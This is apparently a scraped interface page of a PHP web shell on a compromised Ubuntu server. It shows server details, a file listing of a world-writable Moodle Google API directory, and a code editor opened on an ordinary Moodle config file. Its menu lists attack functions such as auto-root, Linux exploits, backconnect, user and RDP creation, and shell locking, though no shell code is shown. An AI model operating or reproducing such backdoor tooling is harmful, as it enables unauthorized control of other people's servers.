Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
lib /
google /
[ HOME SHELL ]
Name
Size
Permission
Action
auth
[ DIR ]
drwxrwxrwx
cache
[ DIR ]
drwxrwxrwx
contrib
[ DIR ]
drwxrwxrwx
external
[ DIR ]
drwxrwxrwx
io
[ DIR ]
drwxrwxrwx
service
[ DIR ]
drwxrwxrwx
Google_Client.php
13.17
KB
-rwxrwxrwx
LICENSE
10.02
KB
-rwxrwxrwx
NOTICE
123
B
-rwxrwxrwx
README
1.28
KB
-rwxrwxrwx
config.php
3.2
KB
-rwxrwxrwx
curlio.php
7.06
KB
-rwxrwxrwx
local_config.php
1.7
KB
-rwxrwxrwx
readme_moodle.txt
904
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : local_config.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Basic configuration overwrite for Google API. * * @package core * @copyright Frédéric Massart <fred@moodle.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die(); global $CFG, $SITE; require_once($CFG->libdir . '/weblib.php'); require_once($CFG->libdir . '/google/curlio.php'); make_temp_directory('googleapi'); $GoogleConfigTempDir = $CFG->tempdir . '/googleapi'; global $apiConfig; $apiConfig = array( // Application name. 'application_name' => 'Moodle ' . $CFG->release, // Site name to show in the Google's OAuth 1 authentication screen. 'site_name' => $SITE->fullname, // Which HTTP IO classes to use. 'ioClass' => 'moodle_google_curlio', // Cache class directory, it should never be used but created just in case. 'ioFileCache_directory' => $GoogleConfigTempDir, // Default Access Type for OAuth 2.0. 'oauth2_access_type' => 'online', // Default Approval Prompt for OAuth 2.0. 'oauth2_approval_prompt' => 'auto' );
Close